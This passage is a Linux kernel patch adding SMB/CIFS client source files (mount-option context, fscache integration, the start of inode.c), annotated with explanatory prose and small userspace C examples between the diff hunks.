++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_BACKUPGID;
++
++	if (ctx->override_uid)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_OVERR_UID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_OVERR_UID;
++
++	if (ctx->override_gid)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_OVERR_GID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_OVERR_GID;
++
++	if (ctx->dynperm)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_DYNPERM;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_DYNPERM;
++
++	if (ctx->fsc)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_FSCACHE;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_FSCACHE;
++
++	if (ctx->multiuser)
++		cifs_sb->mnt_cifs_flags |= (CIFS_MOUNT_MULTIUSER |
++					    CIFS_MOUNT_NO_PERM);
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MULTIUSER;
++
++
++	if (ctx->strict_io)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_STRICT_IO;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_STRICT_IO;
++
++	if (ctx->direct_io)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_DIRECT_IO;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_DIRECT_IO;
++
++	if (ctx->mfsymlinks)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MF_SYMLINKS;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MF_SYMLINKS;
++	if (ctx->mfsymlinks) {
++		if (ctx->sfu_emul) {
++			/*
++			 * Our SFU ("Services for Unix") emulation does not allow
++			 * creating symlinks but does allow reading existing SFU
++			 * symlinks (it does allow both creating and reading SFU
++			 * style mknod and FIFOs though). When "mfsymlinks" and
++			 * "sfu" are both enabled at the same time, it allows
++			 * reading both types of symlinks, but will only create
++			 * them with mfsymlinks format. This allows better
++			 * Apple compatibility (probably better for Samba too)
++			 * while still recognizing old Windows style symlinks.
++			 */
++			cifs_dbg(VFS, "mount options mfsymlinks and sfu both enabled\n");
++		}
++	}
++	cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SHUTDOWN;
++
++	return;
++}
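The function above is the single translation point between the parsed context and the superblock flag word: every boolean sets or clears exactly one bit, so running it again after a remount recomputes the whole mask idempotently. A compact userspace sketch of the pattern (flag names here are made up):

  #include <stdio.h>

  #define MNT_NO_PERM  (1u << 0)
  #define MNT_SET_UID  (1u << 1)

  struct ctx { int noperm, setuids; };

  static unsigned int update_flags(unsigned int flags, const struct ctx *c)
  {
          if (c->noperm)
                  flags |= MNT_NO_PERM;
          else
                  flags &= ~MNT_NO_PERM;       /* clear, don't just leave it */

          if (c->setuids)
                  flags |= MNT_SET_UID;
          else
                  flags &= ~MNT_SET_UID;
          return flags;
  }

  int main(void)
  {
          struct ctx c = { .noperm = 1, .setuids = 0 };
          printf("0x%x\n", update_flags(0, &c));  /* 0x1 */
          return 0;
  }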
+diff --git a/fs/smb/client/fs_context.h b/fs/smb/client/fs_context.h
+new file mode 100644
+index 0000000000000..26093f54d3e65
+--- /dev/null
++++ b/fs/smb/client/fs_context.h
+@@ -0,0 +1,293 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2020, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ *              David Howells <dhowells@redhat.com>
++ */
++
++#ifndef _FS_CONTEXT_H
++#define _FS_CONTEXT_H
++
++#include "cifsglob.h"
++#include <linux/parser.h>
++#include <linux/fs_parser.h>
++
++/* Log errors in fs_context (new mount api) but also in dmesg (old style) */
++#define cifs_errorf(fc, fmt, ...)			\
++	do {						\
++		errorf(fc, fmt, ## __VA_ARGS__);	\
++		cifs_dbg(VFS, fmt, ## __VA_ARGS__);	\
++	} while (0)
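The cifs_errorf() macro above logs the same message twice on purpose: once into the fs_context, where the new mount API can hand it back to userspace, and once via cifs_dbg() for dmesg. The do { ... } while (0) wrapper is what makes a two-statement macro safe inside an unbraced if/else. A userspace sketch with stand-in loggers (log_ctx/log_dmesg are hypothetical):

  #include <stdio.h>

  #define log_ctx(fmt, ...)   fprintf(stderr, "ctx: "   fmt, ##__VA_ARGS__)
  #define log_dmesg(fmt, ...) fprintf(stderr, "dmesg: " fmt, ##__VA_ARGS__)

  #define errorf2(fmt, ...)                       \
          do {                                    \
                  log_ctx(fmt, ##__VA_ARGS__);    \
                  log_dmesg(fmt, ##__VA_ARGS__);  \
          } while (0)

  int main(void)
  {
          int bad = 1;

          if (bad)
                  errorf2("invalid option %s\n", "vers=0.9"); /* safe unbraced */
          else
                  puts("ok");
          return 0;
  }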
++
++enum smb_version {
++	Smb_1 = 1,
++	Smb_20,
++	Smb_21,
++	Smb_30,
++	Smb_302,
++	Smb_311,
++	Smb_3any,
++	Smb_default,
++	Smb_version_err
++};
++
++enum {
++	Opt_cache_loose,
++	Opt_cache_strict,
++	Opt_cache_none,
++	Opt_cache_ro,
++	Opt_cache_rw,
++	Opt_cache_err
++};
++
++enum cifs_sec_param {
++	Opt_sec_krb5,
++	Opt_sec_krb5i,
++	Opt_sec_krb5p,
++	Opt_sec_ntlmsspi,
++	Opt_sec_ntlmssp,
++	Opt_sec_ntlmv2,
++	Opt_sec_ntlmv2i,
++	Opt_sec_none,
++
++	Opt_sec_err
++};
++
++enum cifs_param {
++	/* Mount options that take no arguments */
++	Opt_user_xattr,
++	Opt_forceuid,
++	Opt_forcegid,
++	Opt_noblocksend,
++	Opt_noautotune,
++	Opt_nolease,
++	Opt_nosparse,
++	Opt_hard,
++	Opt_soft,
++	Opt_perm,
++	Opt_nodelete,
++	Opt_mapposix,
++	Opt_mapchars,
++	Opt_nomapchars,
++	Opt_sfu,
++	Opt_nodfs,
++	Opt_posixpaths,
++	Opt_unix,
++	Opt_nocase,
++	Opt_brl,
++	Opt_handlecache,
++	Opt_forcemandatorylock,
++	Opt_setuidfromacl,
++	Opt_setuids,
++	Opt_dynperm,
++	Opt_intr,
++	Opt_strictsync,
++	Opt_serverino,
++	Opt_rwpidforward,
++	Opt_cifsacl,
++	Opt_acl,
++	Opt_locallease,
++	Opt_sign,
++	Opt_ignore_signature,
++	Opt_seal,
++	Opt_noac,
++	Opt_fsc,
++	Opt_mfsymlinks,
++	Opt_multiuser,
++	Opt_sloppy,
++	Opt_nosharesock,
++	Opt_persistent,
++	Opt_resilient,
++	Opt_tcp_nodelay,
++	Opt_domainauto,
++	Opt_rdma,
++	Opt_modesid,
++	Opt_rootfs,
++	Opt_multichannel,
++	Opt_compress,
++	Opt_witness,
++
++	/* Mount options which take numeric value */
++	Opt_backupuid,
++	Opt_backupgid,
++	Opt_uid,
++	Opt_cruid,
++	Opt_gid,
++	Opt_port,
++	Opt_file_mode,
++	Opt_dirmode,
++	Opt_min_enc_offload,
++	Opt_blocksize,
++	Opt_rasize,
++	Opt_rsize,
++	Opt_wsize,
++	Opt_actimeo,
++	Opt_acdirmax,
++	Opt_acregmax,
++	Opt_closetimeo,
++	Opt_echo_interval,
++	Opt_max_credits,
++	Opt_snapshot,
++	Opt_max_channels,
++	Opt_handletimeout,
++
++	/* Mount options which take string value */
++	Opt_source,
++	Opt_user,
++	Opt_pass,
++	Opt_ip,
++	Opt_domain,
++	Opt_srcaddr,
++	Opt_iocharset,
++	Opt_netbiosname,
++	Opt_servern,
++	Opt_ver,
++	Opt_vers,
++	Opt_sec,
++	Opt_cache,
++
++	/* Mount options to be ignored */
++	Opt_ignore,
++
++	Opt_err
++};
++
++struct smb3_fs_context {
++	bool uid_specified;
++	bool cruid_specified;
++	bool gid_specified;
++	bool sloppy;
++	bool got_ip;
++	bool got_version;
++	bool got_rsize;
++	bool got_wsize;
++	bool got_bsize;
++	unsigned short port;
++
++	char *username;
++	char *password;
++	char *domainname;
++	char *source;
++	char *server_hostname;
++	char *UNC;
++	char *nodename;
++	char workstation_name[CIFS_MAX_WORKSTATION_LEN];
++	char *iocharset;  /* local code page for mapping to and from Unicode */
++	char source_rfc1001_name[RFC1001_NAME_LEN_WITH_NULL]; /* clnt nb name */
++	char target_rfc1001_name[RFC1001_NAME_LEN_WITH_NULL]; /* srvr nb name */
++	kuid_t cred_uid;
++	kuid_t linux_uid;
++	kgid_t linux_gid;
++	kuid_t backupuid;
++	kgid_t backupgid;
++	umode_t file_mode;
++	umode_t dir_mode;
++	enum securityEnum sectype; /* sectype requested via mnt opts */
++	bool sign; /* was signing requested via mnt opts? */
++	bool ignore_signature:1;
++	bool retry:1;
++	bool intr:1;
++	bool setuids:1;
++	bool setuidfromacl:1;
++	bool override_uid:1;
++	bool override_gid:1;
++	bool dynperm:1;
++	bool noperm:1;
++	bool nodelete:1;
++	bool mode_ace:1;
++	bool no_psx_acl:1; /* set if posix acl support should be disabled */
++	bool cifs_acl:1;
++	bool backupuid_specified; /* mount option  backupuid  is specified */
++	bool backupgid_specified; /* mount option  backupgid  is specified */
++	bool no_xattr:1;   /* set if xattr (EA) support should be disabled*/
++	bool server_ino:1; /* use inode numbers from server ie UniqueId */
++	bool direct_io:1;
++	bool strict_io:1; /* strict cache behavior */
++	bool cache_ro:1;
++	bool cache_rw:1;
++	bool remap:1;      /* set to remap seven reserved chars in filenames */
++	bool sfu_remap:1;  /* remap seven reserved chars ala SFU */
++	bool posix_paths:1; /* unset to not ask for posix pathnames. */
++	bool no_linux_ext:1;
++	bool linux_ext:1;
++	bool sfu_emul:1;
++	bool nullauth:1;   /* attempt to authenticate with null user */
++	bool nocase:1;     /* request case insensitive filenames */
++	bool nobrl:1;      /* disable sending byte range locks to srv */
++	bool nohandlecache:1; /* disable caching dir handles if srvr probs */
++	bool mand_lock:1;  /* send mandatory not posix byte range lock reqs */
++	bool seal:1;       /* request transport encryption on share */
++	bool nodfs:1;      /* Do not request DFS, even if available */
++	bool local_lease:1; /* check leases only on local system, not remote */
++	bool noblocksnd:1;
++	bool noautotune:1;
++	bool nostrictsync:1; /* do not force expensive SMBflush on every sync */
++	bool no_lease:1;     /* disable requesting leases */
++	bool no_sparse:1;    /* do not attempt to set files sparse */
++	bool fsc:1;	/* enable fscache */
++	bool mfsymlinks:1; /* use Minshall+French Symlinks */
++	bool multiuser:1;
++	bool rwpidforward:1; /* pid forward for read/write operations */
++	bool nosharesock:1;
++	bool persistent:1;
++	bool nopersistent:1;
++	bool resilient:1; /* noresilient not required since not forced for CA */
++	bool domainauto:1;
++	bool rdma:1;
++	bool multichannel:1;
++	bool use_client_guid:1;
++	/* reuse existing guid for multichannel */
++	u8 client_guid[SMB2_CLIENT_GUID_SIZE];
++	unsigned int bsize;
++	unsigned int rasize;
++	unsigned int rsize;
++	unsigned int wsize;
++	unsigned int min_offload;
++	bool sockopt_tcp_nodelay:1;
++	/* attribute cache timeout for files and directories in jiffies */
++	unsigned long acregmax;
++	unsigned long acdirmax;
++	/* timeout for deferred close of files in jiffies */
++	unsigned long closetimeo;
++	struct smb_version_operations *ops;
++	struct smb_version_values *vals;
++	char *prepath;
++	struct sockaddr_storage dstaddr; /* destination address */
++	struct sockaddr_storage srcaddr; /* allow binding to a local IP */
++	struct nls_table *local_nls; /* This is a copy of the pointer in cifs_sb */
++	unsigned int echo_interval; /* echo interval in secs */
++	__u64 snapshot_time; /* needed for timewarp tokens */
++	__u32 handle_timeout; /* persistent and durable handle timeout in ms */
++	unsigned int max_credits; /* smb3 max_credits 10 < credits < 60000 */
++	unsigned int max_channels;
++	__u16 compression; /* compression algorithm 0xFFFF default 0=disabled */
++	bool rootfs:1; /* if it's a SMB root file system */
++	bool witness:1; /* use witness protocol */
++
++	char *mount_options;
++};
++
++extern const struct fs_parameter_spec smb3_fs_parameters[];
++
++extern int smb3_init_fs_context(struct fs_context *fc);
++extern void smb3_cleanup_fs_context_contents(struct smb3_fs_context *ctx);
++extern void smb3_cleanup_fs_context(struct smb3_fs_context *ctx);
++
++static inline struct smb3_fs_context *smb3_fc2context(const struct fs_context *fc)
++{
++	return fc->fs_private;
++}
++
++extern int smb3_fs_context_dup(struct smb3_fs_context *new_ctx, struct smb3_fs_context *ctx);
++extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
++
++/*
++ * max deferred close timeout (jiffies) - 2^30
++ */
++#define SMB3_MAX_DCLOSETIMEO (1 << 30)
++#define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
++
++extern char *cifs_sanitize_prepath(char *prepath, gfp_t gfp);
++
++#endif
+diff --git a/fs/smb/client/fscache.c b/fs/smb/client/fscache.c
+new file mode 100644
+index 0000000000000..f6f3a6b75601b
+--- /dev/null
++++ b/fs/smb/client/fscache.c
+@@ -0,0 +1,253 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *   CIFS filesystem cache interface
++ *
++ *   Copyright (c) 2010 Novell, Inc.
++ *   Author(s): Suresh Jayaraman <sjayaraman@suse.de>
++ *
++ */
++#include "fscache.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifsproto.h"
++
++static void cifs_fscache_fill_volume_coherency(
++	struct cifs_tcon *tcon,
++	struct cifs_fscache_volume_coherency_data *cd)
++{
++	memset(cd, 0, sizeof(*cd));
++	cd->resource_id		= cpu_to_le64(tcon->resource_id);
++	cd->vol_create_time	= tcon->vol_create_time;
++	cd->vol_serial_number	= cpu_to_le32(tcon->vol_serial_number);
++}
++
++int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon)
++{
++	struct cifs_fscache_volume_coherency_data cd;
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct fscache_volume *vcookie;
++	const struct sockaddr *sa = (struct sockaddr *)&server->dstaddr;
++	size_t slen, i;
++	char *sharename;
++	char *key;
++	int ret = -ENOMEM;
++
++	tcon->fscache = NULL;
++	switch (sa->sa_family) {
++	case AF_INET:
++	case AF_INET6:
++		break;
++	default:
++		cifs_dbg(VFS, "Unknown network family '%d'\n", sa->sa_family);
++		return -EINVAL;
++	}
++
++	memset(&key, 0, sizeof(key));
++
++	sharename = extract_sharename(tcon->tree_name);
++	if (IS_ERR(sharename)) {
++		cifs_dbg(FYI, "%s: couldn't extract sharename\n", __func__);
++		return -EINVAL;
++	}
++
++	slen = strlen(sharename);
++	for (i = 0; i < slen; i++)
++		if (sharename[i] == '/')
++			sharename[i] = ';';
++
++	key = kasprintf(GFP_KERNEL, "cifs,%pISpc,%s", sa, sharename);
++	if (!key)
++		goto out;
++
++	cifs_fscache_fill_volume_coherency(tcon, &cd);
++	vcookie = fscache_acquire_volume(key,
++					 NULL, /* preferred_cache */
++					 &cd, sizeof(cd));
++	cifs_dbg(FYI, "%s: (%s/0x%p)\n", __func__, key, vcookie);
++	if (IS_ERR(vcookie)) {
++		if (vcookie != ERR_PTR(-EBUSY)) {
++			ret = PTR_ERR(vcookie);
++			goto out_2;
++		}
++		pr_err("Cache volume key already in use (%s)\n", key);
++		vcookie = NULL;
++	}
++
++	tcon->fscache = vcookie;
++	ret = 0;
++out_2:
++	kfree(key);
++out:
++	kfree(sharename);
++	return ret;
++}
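The volume cookie key built above is "cifs,<server address>,<share>", with every '/' in the share name rewritten to ';' before the key is assembled. A userspace sketch of just the key construction (the %pISpc address formatting is a kernel printk extension, so a literal address string stands in here):

  #define _GNU_SOURCE
  #include <stdio.h>
  #include <stdlib.h>

  int main(void)
  {
          char sharename[] = "srv/share";        /* hypothetical share */
          const char *addr = "192.0.2.1:445";    /* hypothetical address */
          char *key;

          for (size_t i = 0; sharename[i]; i++)
                  if (sharename[i] == '/')
                          sharename[i] = ';';    /* sanitize, as above */

          if (asprintf(&key, "cifs,%s,%s", addr, sharename) < 0)
                  return 1;
          puts(key);                 /* cifs,192.0.2.1:445,srv;share */
          free(key);
          return 0;
  }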
++
++void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon)
++{
++	struct cifs_fscache_volume_coherency_data cd;
++
++	cifs_dbg(FYI, "%s: (0x%p)\n", __func__, tcon->fscache);
++
++	cifs_fscache_fill_volume_coherency(tcon, &cd);
++	fscache_relinquish_volume(tcon->fscache, &cd, false);
++	tcon->fscache = NULL;
++}
++
++void cifs_fscache_get_inode_cookie(struct inode *inode)
++{
++	struct cifs_fscache_inode_coherency_data cd;
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++
++	cifs_fscache_fill_coherency(&cifsi->netfs.inode, &cd);
++
++	cifsi->netfs.cache =
++		fscache_acquire_cookie(tcon->fscache, 0,
++				       &cifsi->uniqueid, sizeof(cifsi->uniqueid),
++				       &cd, sizeof(cd),
++				       i_size_read(&cifsi->netfs.inode));
++}
++
++void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update)
++{
++	if (update) {
++		struct cifs_fscache_inode_coherency_data cd;
++		loff_t i_size = i_size_read(inode);
++
++		cifs_fscache_fill_coherency(inode, &cd);
++		fscache_unuse_cookie(cifs_inode_cookie(inode), &cd, &i_size);
++	} else {
++		fscache_unuse_cookie(cifs_inode_cookie(inode), NULL, NULL);
++	}
++}
++
++void cifs_fscache_release_inode_cookie(struct inode *inode)
++{
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
++
++	if (cookie) {
++		cifs_dbg(FYI, "%s: (0x%p)\n", __func__, cookie);
++		fscache_relinquish_cookie(cookie, false);
++		cifsi->netfs.cache = NULL;
++	}
++}
++
++/*
++ * Fallback page reading interface.
++ */
++static int fscache_fallback_read_page(struct inode *inode, struct page *page)
++{
++	struct netfs_cache_resources cres;
++	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
++	struct iov_iter iter;
++	struct bio_vec bvec[1];
++	int ret;
++
++	memset(&cres, 0, sizeof(cres));
++	bvec[0].bv_page		= page;
++	bvec[0].bv_offset	= 0;
++	bvec[0].bv_len		= PAGE_SIZE;
++	iov_iter_bvec(&iter, ITER_DEST, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++
++	ret = fscache_begin_read_operation(&cres, cookie);
++	if (ret < 0)
++		return ret;
++
++	ret = fscache_read(&cres, page_offset(page), &iter, NETFS_READ_HOLE_FAIL,
++			   NULL, NULL);
++	fscache_end_operation(&cres);
++	return ret;
++}
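The fallback read above wraps a single page in a one-element bio_vec, points an iov_iter at it, and hands the iterator to the generic fscache read engine. The closest userspace analogue is describing one buffer with a one-element iovec and passing it to preadv(2); a sketch of that shape, reading an arbitrary local file as stand-in data:

  #define _GNU_SOURCE
  #include <fcntl.h>
  #include <stdio.h>
  #include <sys/uio.h>
  #include <unistd.h>

  #define PAGE_SIZE 4096

  int main(void)
  {
          static char page[PAGE_SIZE];
          struct iovec vec[1] = { { .iov_base = page, .iov_len = PAGE_SIZE } };
          int fd = open("/etc/hostname", O_RDONLY);   /* stand-in source */
          ssize_t n;

          if (fd < 0)
                  return 1;
          n = preadv(fd, vec, 1, 0);   /* read "page 0" at byte offset 0 */
          printf("read %zd bytes\n", n);
          close(fd);
          return 0;
  }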
++
++/*
++ * Fallback page writing interface.
++ */
++static int fscache_fallback_write_page(struct inode *inode, struct page *page,
++				       bool no_space_allocated_yet)
++{
++	struct netfs_cache_resources cres;
++	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
++	struct iov_iter iter;
++	struct bio_vec bvec[1];
++	loff_t start = page_offset(page);
++	size_t len = PAGE_SIZE;
++	int ret;
++
++	memset(&cres, 0, sizeof(cres));
++	bvec[0].bv_page		= page;
++	bvec[0].bv_offset	= 0;
++	bvec[0].bv_len		= PAGE_SIZE;
++	iov_iter_bvec(&iter, ITER_SOURCE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++
++	ret = fscache_begin_write_operation(&cres, cookie);
++	if (ret < 0)
++		return ret;
++
++	ret = cres.ops->prepare_write(&cres, &start, &len, i_size_read(inode),
++				      no_space_allocated_yet);
++	if (ret == 0)
++		ret = fscache_write(&cres, page_offset(page), &iter, NULL, NULL);
++	fscache_end_operation(&cres);
++	return ret;
++}
++
++/*
++ * Retrieve a page from FS-Cache
++ */
++int __cifs_readpage_from_fscache(struct inode *inode, struct page *page)
++{
++	int ret;
++
++	cifs_dbg(FYI, "%s: (fsc:%p, p:%p, i:0x%p)\n",
++		 __func__, cifs_inode_cookie(inode), page, inode);
++
++	ret = fscache_fallback_read_page(inode, page);
++	if (ret < 0)
++		return ret;
++
++	/* Read completed synchronously */
++	SetPageUptodate(page);
++	return 0;
++}
++
++void __cifs_readpage_to_fscache(struct inode *inode, struct page *page)
++{
++	cifs_dbg(FYI, "%s: (fsc: %p, p: %p, i: %p)\n",
++		 __func__, cifs_inode_cookie(inode), page, inode);
++
++	fscache_fallback_write_page(inode, page, true);
++}
++
++/*
++ * Query the cache occupancy.
++ */
++int __cifs_fscache_query_occupancy(struct inode *inode,
++				   pgoff_t first, unsigned int nr_pages,
++				   pgoff_t *_data_first,
++				   unsigned int *_data_nr_pages)
++{
++	struct netfs_cache_resources cres;
++	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
++	loff_t start, data_start;
++	size_t len, data_len;
++	int ret;
++
++	ret = fscache_begin_read_operation(&cres, cookie);
++	if (ret < 0)
++		return ret;
++
++	start = first * PAGE_SIZE;
++	len = nr_pages * PAGE_SIZE;
++	ret = cres.ops->query_occupancy(&cres, start, len, PAGE_SIZE,
++					&data_start, &data_len);
++	if (ret == 0) {
++		*_data_first = data_start / PAGE_SIZE;
++		*_data_nr_pages = len / PAGE_SIZE;
++	}
++
++	fscache_end_operation(&cres);
++	return ret;
++}
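The occupancy query above converts page indexes to byte ranges on the way into the cache and byte results back to page counts on the way out. A worked example of those conversions, assuming 4 KiB pages:

  #include <stdio.h>

  #define PAGE_SIZE 4096UL

  int main(void)
  {
          unsigned long first = 3, nr_pages = 8;
          unsigned long start = first * PAGE_SIZE;           /* 12288 */
          unsigned long len = nr_pages * PAGE_SIZE;          /* 32768 */
          unsigned long data_start = 16384, data_len = 8192; /* from cache */

          printf("query bytes [%lu, %lu)\n", start, start + len);
          printf("data first page %lu, data pages %lu\n",
                 data_start / PAGE_SIZE, data_len / PAGE_SIZE);  /* 4, 2 */
          return 0;
  }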
+diff --git a/fs/smb/client/fscache.h b/fs/smb/client/fscache.h
+new file mode 100644
+index 0000000000000..67b601041f0a3
+--- /dev/null
++++ b/fs/smb/client/fscache.h
+@@ -0,0 +1,148 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *   CIFS filesystem cache interface definitions
++ *
++ *   Copyright (c) 2010 Novell, Inc.
++ *   Author(s): Suresh Jayaraman <sjayaraman@suse.de>
++ *
++ */
++#ifndef _CIFS_FSCACHE_H
++#define _CIFS_FSCACHE_H
++
++#include <linux/swap.h>
++#include <linux/fscache.h>
++
++#include "cifsglob.h"
++
++/*
++ * Coherency data attached to CIFS volume within the cache
++ */
++struct cifs_fscache_volume_coherency_data {
++	__le64	resource_id;		/* unique server resource id */
++	__le64	vol_create_time;
++	__le32	vol_serial_number;
++} __packed;
++
++/*
++ * Coherency data attached to CIFS inode within the cache.
++ */
++struct cifs_fscache_inode_coherency_data {
++	__le64 last_write_time_sec;
++	__le64 last_change_time_sec;
++	__le32 last_write_time_nsec;
++	__le32 last_change_time_nsec;
++};
++
++#ifdef CONFIG_CIFS_FSCACHE
++
++/*
++ * fscache.c
++ */
++extern int cifs_fscache_get_super_cookie(struct cifs_tcon *);
++extern void cifs_fscache_release_super_cookie(struct cifs_tcon *);
++
++extern void cifs_fscache_get_inode_cookie(struct inode *inode);
++extern void cifs_fscache_release_inode_cookie(struct inode *);
++extern void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update);
++
++static inline
++void cifs_fscache_fill_coherency(struct inode *inode,
++				 struct cifs_fscache_inode_coherency_data *cd)
++{
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++
++	memset(cd, 0, sizeof(*cd));
++	cd->last_write_time_sec   = cpu_to_le64(cifsi->netfs.inode.i_mtime.tv_sec);
++	cd->last_write_time_nsec  = cpu_to_le32(cifsi->netfs.inode.i_mtime.tv_nsec);
++	cd->last_change_time_sec  = cpu_to_le64(cifsi->netfs.inode.i_ctime.tv_sec);
++	cd->last_change_time_nsec = cpu_to_le32(cifsi->netfs.inode.i_ctime.tv_nsec);
++}
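The coherency data filled in above is a packed, little-endian copy of the inode's mtime and ctime; the cache compares this blob against its stored copy to decide whether cached contents are still usable. A userspace sketch of the same fill-and-compare idea (htole64/htole32 stand in for the kernel's cpu_to_le64/cpu_to_le32, and the struct layout here is illustrative):

  #include <endian.h>
  #include <stdint.h>
  #include <stdio.h>
  #include <string.h>

  struct coherency {
          uint64_t mtime_sec, ctime_sec;
          uint32_t mtime_nsec, ctime_nsec;
  };

  static void fill(struct coherency *cd, uint64_t msec, uint32_t mnsec,
                   uint64_t csec, uint32_t cnsec)
  {
          memset(cd, 0, sizeof(*cd));          /* zero padding, as above */
          cd->mtime_sec  = htole64(msec);
          cd->mtime_nsec = htole32(mnsec);
          cd->ctime_sec  = htole64(csec);
          cd->ctime_nsec = htole32(cnsec);
  }

  int main(void)
  {
          struct coherency a, b;

          fill(&a, 1700000000, 0, 1700000000, 0);
          fill(&b, 1700000000, 0, 1700000001, 0);  /* ctime moved on */
          printf("cache valid: %s\n", memcmp(&a, &b, sizeof(a)) ? "no" : "yes");
          return 0;
  }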
++
++
++static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode)
++{
++	return netfs_i_cookie(&CIFS_I(inode)->netfs);
++}
++
++static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags)
++{
++	struct cifs_fscache_inode_coherency_data cd;
++
++	cifs_fscache_fill_coherency(inode, &cd);
++	fscache_invalidate(cifs_inode_cookie(inode), &cd,
++			   i_size_read(inode), flags);
++}
++
++extern int __cifs_fscache_query_occupancy(struct inode *inode,
++					  pgoff_t first, unsigned int nr_pages,
++					  pgoff_t *_data_first,
++					  unsigned int *_data_nr_pages);
++
++static inline int cifs_fscache_query_occupancy(struct inode *inode,
++					       pgoff_t first, unsigned int nr_pages,
++					       pgoff_t *_data_first,
++					       unsigned int *_data_nr_pages)
++{
++	if (!cifs_inode_cookie(inode))
++		return -ENOBUFS;
++	return __cifs_fscache_query_occupancy(inode, first, nr_pages,
++					      _data_first, _data_nr_pages);
++}
++
++extern int __cifs_readpage_from_fscache(struct inode *pinode, struct page *ppage);
++extern void __cifs_readpage_to_fscache(struct inode *pinode, struct page *ppage);
++
++
++static inline int cifs_readpage_from_fscache(struct inode *inode,
++					     struct page *page)
++{
++	if (cifs_inode_cookie(inode))
++		return __cifs_readpage_from_fscache(inode, page);
++	return -ENOBUFS;
++}
++
++static inline void cifs_readpage_to_fscache(struct inode *inode,
++					    struct page *page)
++{
++	if (cifs_inode_cookie(inode))
++		__cifs_readpage_to_fscache(inode, page);
++}
++
++#else /* CONFIG_CIFS_FSCACHE */
++static inline
++void cifs_fscache_fill_coherency(struct inode *inode,
++				 struct cifs_fscache_inode_coherency_data *cd)
++{
++}
++
++static inline int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon) { return 0; }
++static inline void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon) {}
++
++static inline void cifs_fscache_get_inode_cookie(struct inode *inode) {}
++static inline void cifs_fscache_release_inode_cookie(struct inode *inode) {}
++static inline void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update) {}
++static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode) { return NULL; }
++static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags) {}
++
++static inline int cifs_fscache_query_occupancy(struct inode *inode,
++					       pgoff_t first, unsigned int nr_pages,
++					       pgoff_t *_data_first,
++					       unsigned int *_data_nr_pages)
++{
++	*_data_first = ULONG_MAX;
++	*_data_nr_pages = 0;
++	return -ENOBUFS;
++}
++
++static inline int
++cifs_readpage_from_fscache(struct inode *inode, struct page *page)
++{
++	return -ENOBUFS;
++}
++
++static inline
++void cifs_readpage_to_fscache(struct inode *inode, struct page *page) {}
++
++#endif /* CONFIG_CIFS_FSCACHE */
++
++#endif /* _CIFS_FSCACHE_H */
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+new file mode 100644
+index 0000000000000..92c1ed9304be7
+--- /dev/null
++++ b/fs/smb/client/inode.c
+@@ -0,0 +1,3093 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2010
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/pagemap.h>
++#include <linux/freezer.h>
++#include <linux/sched/signal.h>
++#include <linux/wait_bit.h>
++#include <linux/fiemap.h>
++#include <asm/div64.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "fscache.h"
++#include "fs_context.h"
++#include "cifs_ioctl.h"
++#include "cached_dir.h"
++
++static void cifs_set_ops(struct inode *inode)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	switch (inode->i_mode & S_IFMT) {
++	case S_IFREG:
